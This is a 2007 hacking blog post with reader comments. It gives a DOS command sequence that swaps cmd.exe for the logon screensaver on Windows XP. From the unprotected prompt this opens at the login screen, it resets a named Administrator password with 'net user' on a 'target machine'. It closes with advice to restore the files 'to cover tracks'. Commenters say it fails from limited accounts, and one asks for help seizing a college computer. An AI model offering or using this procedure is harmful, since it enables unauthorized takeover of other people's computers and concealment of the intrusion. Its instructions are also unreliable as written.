Subscribe to Hacking Truths. Now, 9183 members!      RSS Feed Be Our Fan on Facebook Twitter SMS Alerts

Home » Hardcore Hacking

How to Hack Windows XP Admin Password

28 November 2007 6 Comments Posted By Ashik
StumbleUpon.com
Share

If you log into a limited account on your target machine and open up a dos prompt then enter this set of commands Exactly :

cd\ *drops to root
cd\windows\system32 *directs to the system32 dir
mkdir temphack *creates the folder temphack
copy logon.scr temphack\logon.scr *backsup logon.scr
copy cmd.exe temphack\cmd.exe *backsup cmd.exe
del logon.scr *deletes original logon.scr
rename cmd.exe logon.scr *renames cmd.exe to logon.scr
exit *quits dos


Now what you have just done is told the computer to backup the command program and the screen saver file, then edits the settings so when the machine boots the screen saver you will get an unprotected dos prompt without logging into XP.

Once this happens if you enter this command :

net user password

If the Administrator Account is called Frank and you want the password blah enter this

net user Frank blah

and this changes the password on franks machine to blah and your in.

Have Fun!

p.s: dont forget to copy the contents of temphack back into the system32 dir to cover tracks

Popularity: 2% [?]



Enjoyed this article? Subscribe to Hacking Truths and get daily updates about new cool websites and programs in your email for free.


6 Comments »

  • BlogKut said:

    You have a nice blog, why don’t you get listed in BLOGKUT.COM. Also refer some of your friends blogs to BLOGKUT.COM. Thanks for your co-operation.

  • zahid said:

    it wont work 4 me…ill explain wot happens after cuz i need to get my dinner :P

  • Anonymous said:

    Nice try… but I don’t have the permission to create modify or delete any folder or file… Aní other method?

  • gvs said:

    windows willnot allow you to create a file in c drive whn you are in limited account…..

  • Lance said:

    Your actual best bet on resetting the admin password is getting a boot utility. My favorite one is Hirens Boot CD, you download it, burn it to a CD and use it while the computer is booting up. It also comes with many other helpful tools within the CD. Google it.

  • sreenath said:

    hey, i cannot hack the Admin pasword in my college computer.

    the coding above is not sufficient, because the systems are writing protected………..please can u help me to hack that and make it mine???

Note : If you have any Query related to the above Article please Post it to the Support Forum.

Leave your response!

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.

You can use these tags:
<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <strike> <strong>

This is a Gravatar-enabled weblog. To get your own globally-recognized-avatar, please register at Gravatar.

Comment moderation is enabled. Your comment may take some time to appear.